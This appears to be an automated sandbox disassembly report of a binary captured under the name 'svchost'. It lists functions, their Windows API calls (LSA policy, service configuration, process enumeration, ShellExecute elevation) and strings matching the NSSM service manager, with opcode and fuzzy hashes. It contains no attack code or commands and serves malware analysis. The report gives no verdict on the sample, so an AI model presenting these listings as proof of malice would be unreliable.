String ID: AppStderr$AppStdout$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$stderr$stdin$stdout
API String ID: 1214770103-1833172568
Opcode ID: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
Instruction ID: 6ae8fdd2871f227cf13b581f7b9c8d83ca64bc36ba86afe41948fee67ebde81e
Opcode Fuzzy Hash: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
Instruction Fuzzy Hash: 82E184F1940704ABD724DB75DC45FE773ACEB84308F40492EF65E93182E679A844CB69

Function 004010C0 Relevance: 72.2, APIs: 37, Strings: 4, Instructions: 404memoryCOMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040111B
GetProcessHeap.KERNEL32(00000000,?), ref: 00401150
HeapAlloc.KERNEL32(00000000), ref: 00401153
GetComputerNameW.KERNEL32 ref: 00401185
GetProcessHeap.KERNEL32(00000000,?), ref: 004011B4
HeapAlloc.KERNEL32(00000000), ref: 004011B7
LsaClose.ADVAPI32(?), ref: 004011F0
LsaLookupNames.ADVAPI32(?,00000001,?,?,?), ref: 0040126B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00401275
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00401278
LsaClose.ADVAPI32(?), ref: 0040128B
LsaFreeMemory.ADVAPI32(?), ref: 00401299
LsaFreeMemory.ADVAPI32(?), ref: 004012A3
LsaNtStatusToWinError.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 004012A9

Part of subcall function 00401000: LsaOpenPolicy.ADVAPI32(00000000,000F0FFF,000F0FFF,?), ref: 0040102D
Part of subcall function 00401000: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 00401037

Strings

%s\%s, xrefs: 0040121A
username_sid, xrefs: 004011C3, 004013A4
SID, xrefs: 004013A9
expanded, xrefs: 004011C8

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess$AllocCloseErrorMemoryStatus$ComputerLookupNameNamesOpenPolicy__wcsnicmp
String ID: %s\%s$SID$expanded$username_sid
API String ID: 1950436716-179756375
Opcode ID: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
Instruction ID: 8923221f29891c7587102ab13130cbc3c72cae1e0e7c2496b089627ed1adcca3
Opcode Fuzzy Hash: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
Instruction Fuzzy Hash: 06D1D3B1A043016FD300EB65CD85EAFB3E9EF88308F44492EF545D7351EA78E9458B9A

Function 00411260 Relevance: 47.6, APIs: 24, Strings: 3, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008), ref: 0041135B
HeapAlloc.KERNEL32(00000000), ref: 0041135E
GetProcessHeap.KERNEL32(00000000,?), ref: 0041139B
HeapFree.KERNEL32(00000000), ref: 0041139E
GetProcessHeap.KERNEL32(00000000,?), ref: 004113AB
HeapFree.KERNEL32(00000000), ref: 004113AE
GetProcessHeap.KERNEL32(00000000,?), ref: 00411430
HeapAlloc.KERNEL32(00000000), ref: 00411433
GetProcessHeap.KERNEL32(00000000,?), ref: 00411470
HeapFree.KERNEL32(00000000), ref: 00411473
GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114E9
HeapFree.KERNEL32(00000000), ref: 004114EC
GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114F9
HeapFree.KERNEL32(00000000), ref: 004114FC
GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411509
HeapFree.KERNEL32(00000000), ref: 0041150C
GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411519
HeapFree.KERNEL32(00000000), ref: 0041151C
ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041153C
GetLastError.KERNEL32 ref: 00411546
GetProcessHeap.KERNEL32(00000000,?), ref: 00411576
HeapFree.KERNEL32(00000000), ref: 0041157D
GetProcessHeap.KERNEL32(00000000,?), ref: 00411596
HeapFree.KERNEL32(00000000), ref: 0041159D

Strings

dependencies, xrefs: 00411444
native_set_dependongroup, xrefs: 0041136A, 0041143F
canon, xrefs: 0041136F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$Free$Alloc$ChangeConfigErrorLastService
String ID: canon$dependencies$native_set_dependongroup
API String ID: 1452945198-1240925597
Opcode ID: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
Instruction ID: b18a58e69c4f32cef05835414142f752b3cd4a08407a03f402dfde9a93b034f2
Opcode Fuzzy Hash: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
Instruction Fuzzy Hash: 829129B19043066BD710AF65CC84EEB73D8EF84354F444A2AFA55D3290E778ED84C7A9

Function 00408D50 Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 325fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00408D89
IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00408E39
CloseHandle.KERNEL32(?), ref: 00408EA4
MoveFileW.KERNEL32(?,?), ref: 00408EB2

Strings

MoveFile(), xrefs: 00408F0F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: FileHandle$CloseInformationMoveTextUnicode
String ID: MoveFile()
API String ID: 2866973295-3582319293
Opcode ID: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
Instruction ID: d8a2b6048f09d48243753343ed7bb43d63bee3e823a3270b0cadf41497ef1fc2
Opcode Fuzzy Hash: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
Instruction Fuzzy Hash: CEB185B1604301AFD320DF65CD85E6BB7E9EFC8308F00492EF58693291DA74E945CB6A

Function 0040F580 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 344COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F5D8

Strings

"%s" %s, xrefs: 0040F64F
NSSM, xrefs: 0040F94E
D, xrefs: 0040F5E5
%lu, xrefs: 0040F913, 0040F92E
command line, xrefs: 0040F676
start_service, xrefs: 0040F671

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: _memset
String ID: "%s" %s$%lu$D$NSSM$command line$start_service
API String ID: 2102423945-3686305457
Opcode ID: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
Instruction ID: 8d8a3d24360daf10ba7eb9db1eca87cf74f697693d6f1518d53dda03d5ccb93b
Opcode Fuzzy Hash: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
Instruction Fuzzy Hash: BFC179F1A10700ABD720DB65DC46FDB73D8AB84308F40493EF69DA61C1E6BDA544CB69

Function 0040EF10 Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

%s: %s: %s, xrefs: 0040F0CC, 0040F0FA, 0040F207, 0040F237
%s, xrefs: 0040F137
%s: %s, xrefs: 0040F15A

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ConsoleWindow
String ID: %s$%s: %s$%s: %s: %s
API String ID: 2863861424-3854535108
Opcode ID: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
Instruction ID: 763075a4a37bd2d8825689e23daf19d261bde39fceb0a92dd0ece0a9df8372dc
Opcode Fuzzy Hash: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
Instruction Fuzzy Hash: A981DBF6D04200BBE22077719C46BAF725C9B9431DF44093FF906A62C2FA7CD95946AB

Function 0040A580 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 229processCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040A5C0

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040A5DE

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

OpenProcess.KERNEL32(00100411,00000000,?), ref: 0040A610
__snwprintf_s.LIBCMT ref: 0040A639
GetExitCodeProcess.KERNEL32(00000000,?), ref: 0040A67A
GetLastError.KERNEL32(00000000), ref: 0040A699
CloseHandle.KERNEL32(00000000), ref: 0040A6C2
CloseHandle.KERNEL32(00000000), ref: 0040A6ED
GetLastError.KERNEL32(00000000), ref: 0040A6F7
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A723
GetLastError.KERNEL32(00000000,00000002,00000000), ref: 0040A72F
_memset.LIBCMT ref: 0040A760
Process32FirstW.KERNEL32 ref: 0040A776
GetLastError.KERNEL32(00000000), ref: 0040A780
Process32NextW.KERNEL32(00000000,?), ref: 0040A7C2
Process32NextW.KERNEL32(00000000,?), ref: 0040A807
GetLastError.KERNEL32(?,00000000,?,?,00000002,00000000), ref: 0040A816
GetLastError.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A81F
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000002,00000000), ref: 0040A83C

Strings

NSSM, xrefs: 0040A6CF
AppStopMethodSkip, xrefs: 0040A6CA
%lu, xrefs: 0040A5AF, 0040A5CD, 0040A628

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ErrorLast$CloseEventHandleProcess32__snwprintf_s$NextProcessSource$CodeCreateDeregisterExitFirstOpenRegisterReportSnapshotToolhelp32__vsnwprintf_s_l_memset
String ID: %lu$AppStopMethodSkip$NSSM
API String ID: 876000941-153837258
Opcode ID: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
Instruction ID: 9356f86b261df9c84ccaf74e0b1af484dc6ccdd0321f5befb0d5a42ea0511750
Opcode Fuzzy Hash: 87d6cd8ad363924e11445b902c5b866b416526b6275c1319dbaef4f3e386f7b6
Instruction Fuzzy Hash: A061C8F15043007BE220A7519D8AFFB736CDF94708F50892EFA49A21C3F6B89515867B

Function 00411680 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 0041171B
HeapFree.KERNEL32(00000000,?,?,?), ref: 00411722
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00411750
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411790
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411793
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004117A0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004117A3
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00411753

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411813
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411816
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411823
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411826
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00411833
HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00411836
ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041185A
GetLastError.KERNEL32 ref: 00411864
GetProcessHeap.KERNEL32(00000000,?), ref: 00411895
HeapFree.KERNEL32(00000000), ref: 0041189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004118B5
HeapFree.KERNEL32(00000000), ref: 004118BC

Strings

native_set_dependonservice, xrefs: 0041175F
dependencies, xrefs: 00411764

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess$AllocChangeConfigErrorLastLocalService_vfwprintf
String ID: dependencies$native_set_dependonservice
API String ID: 2900453341-2849880886
Opcode ID: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
Instruction ID: c8f04e43e909d1bf12b9aa294be1e3cdf98767991595af7166a1449a2d8a3fce
Opcode Fuzzy Hash: eacf11b33cb2cc2d23edf79ce080d1b0cbbaad9b579bfd244ff4f5032ff0d319
Instruction Fuzzy Hash: 0E51D5B1A043016BE610EB65DC45FAB73DCEF84714F048629FA68D72E1EB78DC44C66A

Function 00406A20 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169memorywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00406A39
GetProcessHeap.KERNEL32 ref: 00406A56
HeapAlloc.KERNEL32(00000000), ref: 00406A59
_memset.LIBCMT ref: 00406A74
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000200), ref: 00406AD9
__snwprintf_s.LIBCMT ref: 00406AFC
__snwprintf_s.LIBCMT ref: 00406AB8

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

GetProcessHeap.KERNEL32(00000000,0000FFFE), ref: 00406B48
HeapAlloc.KERNEL32(00000000), ref: 00406B4B
__snwprintf_s.LIBCMT ref: 00406B81
__snwprintf_s.LIBCMT ref: 00406BA5

Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC

GetOpenFileNameW.COMDLG32(?,00000200), ref: 00406BD6
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00406C03
GetProcessHeap.KERNEL32(00000000,?), ref: 00406C1A
HeapFree.KERNEL32(00000000), ref: 00406C1D
GetProcessHeap.KERNEL32(00000000,?), ref: 00406C2A
HeapFree.KERNEL32(00000000), ref: 00406C2D

Strings

:%s:, xrefs: 00406B74
X, xrefs: 00406A4E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process__snwprintf_s$AllocFreeMessage$Format_memset$DefaultFileLangLocalNameOpenSendUser__vsnwprintf_s_l
String ID: :%s:$X
API String ID: 4223584720-3643568712
Opcode ID: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
Instruction ID: 2fb1f1ec6dd78cf9b56019ed523e1d5e6dfd49e8e4e2ad70138c12666923ebb1
Opcode Fuzzy Hash: 6f6cb0b89cacafe10d1f1f8fd1946d6e639445887778fbb56b134f867ee11a65
Instruction Fuzzy Hash: 725103B1A043016BE610EB24CC45FAB77A8EF84754F140A3DFD55A73C1DB78E914CA9A

Function 004099A0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

_memset.LIBCMT ref: 004099BD
GetProcessHeap.KERNEL32 ref: 004099E2
HeapAlloc.KERNEL32(00000000), ref: 004099EB
GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 00409A28
GetProcessHeap.KERNEL32(00000008,0000FFFE), ref: 00409A35
HeapAlloc.KERNEL32(00000000), ref: 00409A38
GetProcessHeap.KERNEL32(00000000,?), ref: 00409A46
HeapFree.KERNEL32(00000000), ref: 00409A49
GetCommandLineW.KERNEL32 ref: 00409A5B
__snwprintf_s.LIBCMT ref: 00409A6F

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

ShellExecuteExW.SHELL32 ref: 00409AD9
GetProcessHeap.KERNEL32(00000000,?), ref: 00409AED
HeapFree.KERNEL32(00000000), ref: 00409AF6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409AFB
HeapFree.KERNEL32(00000000), ref: 00409AFE

Strings

elevate(), xrefs: 004099F5, 00409A4F
<, xrefs: 004099D2
GetCommandLine(), xrefs: 00409A54
GetModuleFileName(), xrefs: 004099FA

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$Free$Alloc$CommandExecuteFileLineLocalModuleNameShell__snwprintf_s__vsnwprintf_s_l_memset_vfwprintf
String ID: <$GetCommandLine()$GetModuleFileName()$elevate()
API String ID: 973368859-4193039769
Opcode ID: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
Instruction ID: 7ae2c759de92c54c39a002a946b74eb1e22cb2beefd2f70ccc6c30d9fe699ef8
Opcode Fuzzy Hash: 900e8c87ca2aa9aec742fd558df0281ba4947d5c9c9fdbed743180e08cd3c412
Instruction Fuzzy Hash: 673128F1E043027AD310ABA5CC46FA77798EF84704F00452AF945E72C1DBBCE9448BA9

Function 004017F0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

SeServiceLogonRight, xrefs: 00401870

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: SeServiceLogonRight
API String ID: 0-347471591
Opcode ID: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
Instruction ID: 1588cd9aa28459d6f698114f179f5034525e64d227a869bba66d549dab2bd090
Opcode Fuzzy Hash: d1ec01c29beff1dc2b7cf4a31634801e6b38091671ebd8c69d5d4f8db8eefe16
Instruction Fuzzy Hash: D751D9F29003016BC210FB659C82A9F73A9EFC4758F44493EF845D3262E63CDA55C7AA

Function 00410BE0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 175registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00410C19

Strings

affinity, xrefs: 00410C79
setting_get_affinity, xrefs: 00410C74
All, xrefs: 00410C24

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: QueryValue
String ID: All$affinity$setting_get_affinity
API String ID: 3660427363-3501811323
Opcode ID: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
Instruction ID: 39c13d5f00e9b419edd27a44e9b0f75dfecbdf5c9278ee4873767282b9cc75a7
Opcode Fuzzy Hash: aadf3678ba3ec564ff7923484b1f3c659c44b9ba2d0e62d742e643e475440171
Instruction Fuzzy Hash: 7041C9B1B042007BE600A779DC45FAF77DCEFC4729F840A5AF558D22D1D6B8DC848A66

Function 00406C40 Relevance: 27.2, APIs: 18, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
Instruction ID: 4a1410ef1443eea10fe89477afcc143de1e533fa6ee3b316fa2d910530bd4db7
Opcode Fuzzy Hash: 1b78011fbee3aa40aefb94b04e9307e1ddbd925d910803d0c7f55a23a13cb692
Instruction Fuzzy Hash: 4661DCB1A84302BBE101A7509C06FFB7398EB94B44F01443AF7527A0C2DBBC56558BAF

Function 0040D520 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,00003FFF,00000000,00008418,00000402), ref: 0040D547
GetLastError.KERNEL32 ref: 0040D549
GetProcessHeap.KERNEL32(00000000,00003FFF,00000000,00000000), ref: 0040D567
HeapAlloc.KERNEL32(00000000), ref: 0040D56A

Strings

SERVICE_CONFIG_DESCRIPTION, xrefs: 0040D57B, 0040D629, 0040D65E
get_service_description(), xrefs: 0040D576

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocConfig2ErrorLastProcessQueryService
String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
API String ID: 2527037045-119971955
Opcode ID: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
Instruction ID: 3e5ba4e39e1bc183658cdb8e0b0057f10ea9e025a726a76105c97a4cff3da096
Opcode Fuzzy Hash: 9949ae250d6f60cbc6c2d3ad254c89fe22e4bd7663aaf79f323aa80c9ae87168
Instruction Fuzzy Hash: 103137F2A413017BE200A7A6EC46FEBB35CDF95729F10052AF509E61C1DAB9D840866A

Function 0040ACE0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 139memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,00000001,00000000), ref: 0040ACEC
HeapAlloc.KERNEL32(00000000), ref: 0040ACF3
_memset.LIBCMT ref: 0040AD2C
RegQueryValueExW.ADVAPI32 ref: 0040AD57
GetLastError.KERNEL32 ref: 0040AD63
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD6E
HeapFree.KERNEL32(00000000), ref: 0040AD75

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

get_string(), xrefs: 0040AD04

Memory Dump Source

